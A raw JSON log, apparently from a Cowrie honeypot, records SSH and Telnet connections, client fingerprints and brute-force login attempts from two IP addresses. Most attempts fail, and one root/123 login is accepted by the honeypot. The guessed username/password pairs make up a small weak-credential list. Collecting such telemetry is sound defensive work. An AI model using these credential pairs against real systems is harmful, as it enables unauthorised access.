{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":15883,"dst_ip":"1.2.3.4","dst_port":22,"session":"6de763ef21dd","protocol":"ssh","message":"New connection: 212.227.125.160:15883 (1.2.3.4:22) [session: 6de763ef21dd]","sensor":"my-vps","timestamp":"2025-08-31T06:33:26.826560Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T06:33:28.495690Z","src_ip":"212.227.125.160","session":"6de763ef21dd"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T06:33:28.554992Z","src_ip":"212.227.125.160","session":"6de763ef21dd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:33:28.826148Z","src_ip":"212.227.125.160","session":"b12ee0c780a8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:33:28.826961Z","src_ip":"212.227.125.160","session":"b12ee0c780a8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"volkodav","message":"login attempt [admin/volkodav] failed","sensor":"my-vps","timestamp":"2025-08-31T06:33:28.878123Z","src_ip":"212.227.125.160","session":"6de763ef21dd"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vishnu","message":"login attempt [admin/vishnu] failed","sensor":"my-vps","timestamp":"2025-08-31T06:33:29.940268Z","src_ip":"212.227.125.160","session":"6de763ef21dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1688,"dst_ip":"1.2.3.4","dst_port":22,"session":"8499a90fa12d","protocol":"ssh","message":"New connection: 212.227.235.229:1688 (1.2.3.4:22) [session: 8499a90fa12d]","sensor":"my-vps","timestamp":"2025-08-31T06:33:29.979472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:33:29.980487Z","src_ip":"212.227.235.229","session":"8499a90fa12d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54776,"dst_ip":"1.2.3.4","dst_port":22,"session":"d609ce88cbed","protocol":"ssh","message":"New connection: 212.227.235.229:54776 (1.2.3.4:22) [session: d609ce88cbed]","sensor":"my-vps","timestamp":"2025-08-31T06:33:30.035367Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:33:30.196703Z","src_ip":"212.227.235.229","session":"8499a90fa12d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:33:30.760634Z","src_ip":"212.227.235.229","session":"d609ce88cbed"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:33:30.762180Z","src_ip":"212.227.235.229","session":"d609ce88cbed"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vicki","message":"login attempt [admin/vicki] failed","sensor":"my-vps","timestamp":"2025-08-31T06:33:31.001746Z","src_ip":"212.227.125.160","session":"6de763ef21dd"}
{"eventid":"cowrie.login.failed","username":"ubuntu22","password":"ubuntu22","message":"login attempt [ubuntu22/ubuntu22] failed","sensor":"my-vps","timestamp":"2025-08-31T06:33:31.098136Z","src_ip":"212.227.235.229","session":"8499a90fa12d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vfnbkmlf","message":"login attempt [admin/vfnbkmlf] failed","sensor":"my-vps","timestamp":"2025-08-31T06:33:32.064007Z","src_ip":"212.227.125.160","session":"6de763ef21dd"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:32.317450Z","src_ip":"212.227.235.229","session":"8499a90fa12d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"veteran","message":"login attempt [admin/veteran] failed","sensor":"my-vps","timestamp":"2025-08-31T06:33:33.125960Z","src_ip":"212.227.125.160","session":"6de763ef21dd"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:34.189301Z","src_ip":"212.227.125.160","session":"6de763ef21dd"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:33:36.812701Z","src_ip":"212.227.235.229","session":"d609ce88cbed"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:38.695085Z","src_ip":"212.227.235.229","session":"d609ce88cbed"}
{"eventid":"cowrie.login.failed","username":"rabbitmq","password":"rabbitmq","message":"login attempt [rabbitmq/rabbitmq] failed","sensor":"my-vps","timestamp":"2025-08-31T06:33:41.362583Z","src_ip":"212.227.125.160","session":"b12ee0c780a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33300,"dst_ip":"1.2.3.4","dst_port":22,"session":"8678f4f8c0c4","protocol":"ssh","message":"New connection: 212.227.235.229:33300 (1.2.3.4:22) [session: 8678f4f8c0c4]","sensor":"my-vps","timestamp":"2025-08-31T06:33:43.172152Z"}
{"eventid":"cowrie.session.closed","duration":"20.2","message":"Connection lost after 20.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:45.220462Z","src_ip":"212.227.125.160","session":"b12ee0c780a8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:33:45.431117Z","src_ip":"212.227.235.229","session":"8678f4f8c0c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:33:45.432432Z","src_ip":"212.227.235.229","session":"8678f4f8c0c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39722,"dst_ip":"1.2.3.4","dst_port":23,"session":"ea28c8846bc8","protocol":"telnet","message":"New connection: 212.227.125.160:39722 (1.2.3.4:23) [session: ea28c8846bc8]","sensor":"my-vps","timestamp":"2025-08-31T06:33:46.818150Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7340,"dst_ip":"1.2.3.4","dst_port":22,"session":"5dc564173c53","protocol":"ssh","message":"New connection: 212.227.235.229:7340 (1.2.3.4:22) [session: 5dc564173c53]","sensor":"my-vps","timestamp":"2025-08-31T06:33:47.151326Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-31T06:33:47.152063Z","src_ip":"212.227.235.229","session":"5dc564173c53"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:47.152800Z","src_ip":"212.227.235.229","session":"5dc564173c53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7344,"dst_ip":"1.2.3.4","dst_port":22,"session":"25811ef0de0a","protocol":"ssh","message":"New connection: 212.227.235.229:7344 (1.2.3.4:22) [session: 25811ef0de0a]","sensor":"my-vps","timestamp":"2025-08-31T06:33:47.535181Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xa3|\ru>P\\x91\\x99\u0001\\xa1q\u0007*HM&p\f\\xac\u0007l\u001eT\\xa6A\\xd9Akb\\xb4Y9\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xa3|\ru>P\\x91\\x99\u0001\\xa1q\u0007*HM&p\f\\xac\u0007l\u001eT\\xa6A\\xd9Akb\\xb4Y9\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-31T06:33:47.536077Z","src_ip":"212.227.235.229","session":"25811ef0de0a"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:47.537887Z","src_ip":"212.227.235.229","session":"25811ef0de0a"}
{"eventid":"cowrie.session.closed","duration":1.2568306922912598,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:48.074911Z","src_ip":"212.227.125.160","session":"ea28c8846bc8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39726,"dst_ip":"1.2.3.4","dst_port":23,"session":"5cf66572defd","protocol":"telnet","message":"New connection: 212.227.125.160:39726 (1.2.3.4:23) [session: 5cf66572defd]","sensor":"my-vps","timestamp":"2025-08-31T06:33:48.170700Z"}
{"eventid":"cowrie.session.closed","duration":1.1038038730621338,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:49.274410Z","src_ip":"212.227.125.160","session":"5cf66572defd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39736,"dst_ip":"1.2.3.4","dst_port":23,"session":"82daa2774e57","protocol":"telnet","message":"New connection: 212.227.125.160:39736 (1.2.3.4:23) [session: 82daa2774e57]","sensor":"my-vps","timestamp":"2025-08-31T06:33:49.369946Z"}
{"eventid":"cowrie.session.closed","duration":1.7975184917449951,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:51.167384Z","src_ip":"212.227.125.160","session":"82daa2774e57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39748,"dst_ip":"1.2.3.4","dst_port":23,"session":"dbbe56229f59","protocol":"telnet","message":"New connection: 212.227.125.160:39748 (1.2.3.4:23) [session: dbbe56229f59]","sensor":"my-vps","timestamp":"2025-08-31T06:33:51.263083Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44928,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2fd67594bf9","protocol":"ssh","message":"New connection: 212.227.125.160:44928 (1.2.3.4:22) [session: c2fd67594bf9]","sensor":"my-vps","timestamp":"2025-08-31T06:33:51.324482Z"}
{"eventid":"cowrie.session.closed","duration":"28.1","message":"Connection lost after 28.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:51.612131Z","src_ip":"212.227.235.229","session":"51511ed4fbe3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:33:51.937483Z","src_ip":"212.227.125.160","session":"c2fd67594bf9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:33:51.938904Z","src_ip":"212.227.125.160","session":"c2fd67594bf9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T06:33:53.157711Z","src_ip":"212.227.125.160","session":"dbbe56229f59"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:33:54.171632Z","src_ip":"212.227.125.160","session":"c2fd67594bf9"}
{"eventid":"cowrie.session.closed","duration":4.123286485671997,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:55.385380Z","src_ip":"212.227.125.160","session":"dbbe56229f59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38412,"dst_ip":"1.2.3.4","dst_port":23,"session":"7b983ba3f636","protocol":"telnet","message":"New connection: 212.227.125.160:38412 (1.2.3.4:23) [session: 7b983ba3f636]","sensor":"my-vps","timestamp":"2025-08-31T06:33:55.483083Z"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:55.981025Z","src_ip":"212.227.125.160","session":"c2fd67594bf9"}
{"eventid":"cowrie.session.closed","duration":1.2656848430633545,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:56.748703Z","src_ip":"212.227.125.160","session":"7b983ba3f636"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38416,"dst_ip":"1.2.3.4","dst_port":23,"session":"c6d53fed977c","protocol":"telnet","message":"New connection: 212.227.125.160:38416 (1.2.3.4:23) [session: c6d53fed977c]","sensor":"my-vps","timestamp":"2025-08-31T06:33:56.846481Z"}
{"eventid":"cowrie.session.closed","duration":1.8161194324493408,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:58.662505Z","src_ip":"212.227.125.160","session":"c6d53fed977c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38432,"dst_ip":"1.2.3.4","dst_port":23,"session":"61dd620ebcb7","protocol":"telnet","message":"New connection: 212.227.125.160:38432 (1.2.3.4:23) [session: 61dd620ebcb7]","sensor":"my-vps","timestamp":"2025-08-31T06:33:58.757786Z"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-31T06:33:59.053098Z","src_ip":"212.227.125.160","session":"61dd620ebcb7"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:00.571463Z","src_ip":"212.227.125.160","session":"61dd620ebcb7"}
{"eventid":"cowrie.session.closed","duration":2.4577794075012207,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:01.215456Z","src_ip":"212.227.125.160","session":"61dd620ebcb7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38446,"dst_ip":"1.2.3.4","dst_port":23,"session":"dd4b6534d63b","protocol":"telnet","message":"New connection: 212.227.125.160:38446 (1.2.3.4:23) [session: dd4b6534d63b]","sensor":"my-vps","timestamp":"2025-08-31T06:34:01.315098Z"}
{"eventid":"cowrie.session.closed","duration":1.7094459533691406,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:03.024476Z","src_ip":"212.227.125.160","session":"dd4b6534d63b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38458,"dst_ip":"1.2.3.4","dst_port":23,"session":"c673c3981a2d","protocol":"telnet","message":"New connection: 212.227.125.160:38458 (1.2.3.4:23) [session: c673c3981a2d]","sensor":"my-vps","timestamp":"2025-08-31T06:34:03.119933Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:03.449698Z","src_ip":"212.227.125.160","session":"c673c3981a2d"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:04.775776Z","src_ip":"212.227.125.160","session":"c673c3981a2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43244,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d12a70b83ec","protocol":"ssh","message":"New connection: 212.227.125.160:43244 (1.2.3.4:22) [session: 2d12a70b83ec]","sensor":"my-vps","timestamp":"2025-08-31T06:34:04.781597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:34:04.782239Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:34:04.941535Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:34:05.423602Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
{"eventid":"cowrie.session.closed","duration":2.418041706085205,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:05.537905Z","src_ip":"212.227.125.160","session":"c673c3981a2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45310,"dst_ip":"1.2.3.4","dst_port":23,"session":"ab9e0db40d9d","protocol":"telnet","message":"New connection: 212.227.125.160:45310 (1.2.3.4:23) [session: ab9e0db40d9d]","sensor":"my-vps","timestamp":"2025-08-31T06:34:05.632550Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:34:06.231023Z","src_ip":"212.227.125.160","session":"2d12a70b83ec"}
